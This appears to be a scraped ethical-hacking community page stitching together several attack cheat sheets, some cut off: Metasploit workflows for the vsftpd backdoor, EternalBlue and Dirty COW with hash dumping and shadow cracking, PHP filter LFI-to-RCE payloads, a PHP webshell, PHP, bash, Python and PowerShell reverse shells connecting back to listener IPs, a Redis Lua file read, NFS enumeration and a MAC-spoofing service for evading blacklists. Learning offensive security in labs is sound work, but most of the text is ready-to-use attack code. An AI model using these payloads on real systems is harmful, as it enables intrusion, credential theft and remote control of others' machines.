Security

📂 Files Dockerfile (placed in empty folder) FROM kalilinux/kali-rolling ENV DEBIAN_FRONTEND=noninteractive TZ=Etc/UTC # install essentials: zsh sudo tzdata chrony util-linux iproute2 RUN apt update && apt install -y \ zsh sudo tzdata chrony util-linux iproute2 \ && useradd -m -s /usr/bin/zsh kali \ && echo "kali:kali" | chpasswd \ && usermod -aG sudo kali \ && apt clean && rm -rf /var/lib/apt/lists/* USER kali WORKDIR /home/kali ENTRYPOINT ["/usr/bin/zsh","-l"] 🛠️ Build Image Run from the folder with Dockerfile docker build -t kali-zsh-vm:privileged . 🚀 Create and Run Persistent Privileged Container This creates kali-persistent with host timezone and /tmp/test mounted ...

🌐 1.Start Metasploit Console sudo systemctl start postgresql msfconsole Initialize the Metasploit Database (First Time Only) msfdb init 🔍 2. Scanning Targets Quick Target Discovery nmap -sn 10.10.10.0/24 Full Port + Version Scan (Integrated with Metasploit DB) db_nmap -sC -sV -O -Pn 10.10.10.129 View Discovered Hosts & Services hosts services 🪡 3. Exploit Search and Module Use Search by service name or CVE search vsftpd search type:exploit name:smb Load a Module use exploit/unix/ftp/vsftpd_234_backdoor Explore Module Info info # Shows full module details (author, platform, options, etc) show options # Required + optional settings (RHOSTS, LHOST, etc) show advanced # Advanced options like threads, timeouts, proxies show payloads # Compatible payloads for this exploit 💡 4. Linux Exploitation Workflow Example: FTP Backdoor use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 10.10.10.129 set payload cmd/unix/interact run If Shell is Basic: Upgrade python3 -c 'import pty; pty.spawn("/bin/bash")' Or Use Web Delivery use exploit/multi/script/web_delivery set payload linux/x86/meterpreter/reverse_tcp set LHOST <your_ip> set LPORT 4444 run Post-Exploitation (Linux) sessions -i 1 getuid sysinfo Enumerate OS and Configs run post/linux/gather/enum_os run post/linux/gather/enum_configs Dump Password Hashes download /etc/passwd download /etc/shadow john shadow --wordlist=/usr/share/wordlists/rockyou.txt Local Exploit Suggestion run post/multi/recon/local_exploit_suggester Example Local Root Exploit use exploit/linux/local/dirty_cow set SESSION 1 run Confirm Root id whoami 💻 5. Windows Exploitation Workflow Example: EternalBlue use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 10.10.10.130 set LHOST <your_ip> set payload windows/x64/meterpreter/reverse_tcp run Session Handling sessions sessions -i 1 sysinfo getuid Post-Exploitation (Windows) Dump Hashes hashdump load kiwi kiwi_cmd "lsadump::sam" Process Migration ps migrate <pid> getpid Privilege Escalation getsystem Or use: ...

Target File .htaccess Output with PHP String Filters No Filter Applied Output: Testing PHP Filter Payload: php://filter/convert.base64-encode/resource=.htaccess Output: VGVzdGluZyBQSFAgRmlsdGVy Payload: php://filter/string.rot13/resource=.htaccess Output: Grfgvat CUC Svygre Payload: php://filter/string.toupper/resource=.htaccess Output: TESTING PHP FILTER Payload: php://filter/string.tolower/resource=.htaccess Output: testing php filter Payload: php://filter/string.strip_tags/resource=.htaccess Output: Testing PHP Filter This filter remove any HTML or PHP tags from the file contents. PHP Payload: <?php system($_GET['cmd']); echo 'Shell done!'; ?> Payload for LIF to RCE: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+&cmd=whoami Output: www-data

This cheat sheet contains common PHP reverse shells and webshell snippets that work in different scenarios. 1. Basic Webshell Using system() <?php system($_GET['cmd']); ?> Usage: Execute commands by passing cmd parameter in URL. Example: http://target.com/webshell.php?cmd=ls 2. PHP Reverse Shell Using One-liner with fsockopen() php -r '$sock=fsockopen("10.9.50.114",3232);exec("/bin/sh -i <&3 >&3 2>&3");' Run this on target if you can execute PHP code directly. Connects back to your listener on port 3232. 3. PHP Reverse Shell Using Named Pipe & Netcat <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.50.114 4242 >/tmp/f")?> Uses a named pipe (/tmp/f) for stable reverse shell. Requires nc (Netcat) on the target machine. 4. PHP One-liner Bash Reverse Shell (Backgrounded) <?PHP exec("nohup /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/9001 0>&1' > /dev/null 2>&1 &"); ?> Runs bash reverse shell in the background. Useful to keep shell persistent after HTTP request ends. 🔥 Tips & Notes Replace IP and ports with your attacker machine’s IP and desired port. Use nc -lvnp <port> on your machine to catch the reverse shell. Some functions like exec(), system() might be disabled — test alternatives (passthru(), shell_exec(), popen()). If nc is not installed on the target, try pure PHP or bash based shells. Always check if the web server user has permissions to execute commands or create named pipes. Combine these shells with Chankro or php-reverse-shell for better evasion.

This cheat sheet shows useful Python reverse shell one-liners and a PowerShell reverse shell generator in Python. 1. Python3 Reverse Shell One-liner python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.50.114",3232));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' Connects back to attacker IP 10.9.50.114 on port 3232. Uses socket, duplicates file descriptors for stdin/stdout/stderr. Spawns an interactive /bin/sh shell. Works on most Linux systems with Python 3 installed. 2. Python Script to Generate PowerShell Reverse Shell Command (Base64 Encoded) #!/usr/bin/env python3 import sys import base64 def help(): print("USAGE: %s IP PORT" % sys.argv[0]) print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT") exit() try: (ip, port) = (sys.argv[1], int(sys.argv[2])) except: help() payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' payload = payload % (ip, port) cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode() print(cmdline) How to use: Run this script: ...

Redis allows the execution of Lua scripts through the EVAL command. If Redis is misconfigured or exposed to attackers, the Lua scripting engine can be used to execute arbitrary commands, including reading files on the system. File Read via EVAL Command You can read the contents of a file (e.g., /flag.txt) using the EVAL command in the Redis interactive shell: EVAL "return io.popen('cat /flag.txt'):read('*a')" 0

1. Stay Focused on Learning & Skill Development: This group is a knowledge hub for ethical hacking, cybersecurity, and Kali Linux. ✅ Ask questions, share knowledge, and help each other grow! ✅ All posts must be relevant to these topics. 🚫 Basic Kali errors? Ask in the Community Chat, not as a post. 💡 Tip: Search before asking! Many common issues are already discussed. We’re here to learn, not to clutter the group with unnecessary posts. ...

1. Focus on Learning and Skill Development: The primary focus of this group is to provide a platform for discussions, sharing, and collaboration related to ethical hacking, cybersecurity and Kali Linux. Members are encouraged to ask questions and share their knowledge and experiences to improve their skills and understanding of these topics. All posts related to these topics are welcome and encouraged. But asking for assistance with basic errors in Kali Linux may not be approved. So, please ask in the Community Chat. ...

To scan for rpcbind on a network and check NFS shares, use the following command: sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP # Scanning port 111 for rpcbind and list NFS shares Listing Mounted Partitions on the Network To list the mounted partitions of a network system, use: showmount -e $IP # List the exported directories on the NFS server Mounting rpcbind Directories on Local Machine To mount a remote NFS directory on local machine. In this example, the directory /var is mounted from the remote server with IP 10.10.122.178. ...

This method allows users to change their WiFi adapter’s MAC address persistently. It also enables users to bypass MAC address blacklisting by network owners, as it allows connection to WiFi networks with a spoofed MAC address. Step 1: Writing a systemd Service Create a systemd service to change your MAC address and place it in the /etc/systemd/system/ directory with the name mac-spoofer.service. cat /etc/systemd/system/mac-spoofer.service [Unit] Description=MAC Address Change/spoofing wlo1 Wants=network-pre.target Before=network-pre.target BindsTo=sys-subsystem-net-devices-wlo1.device After=sys-subsystem-net-devices-wlo1.device [Service] Type=oneshot User=root ExecStart=/usr/bin/ifconfig wlo1 down ExecStart=/usr/bin/macchanger -r -b wlo1 ExecStart=/usr/bin/ifconfig wlo1 up [Install] WantedBy=multi-user.target Step 2: Creating a Dispatcher Script Create a script in the /etc/NetworkManager/dispatcher.d/ directory and grant it executable permission. This directory contains scripts to handle various network-related events, which are automatically executed in response to specific events managed by NetworkManager. ...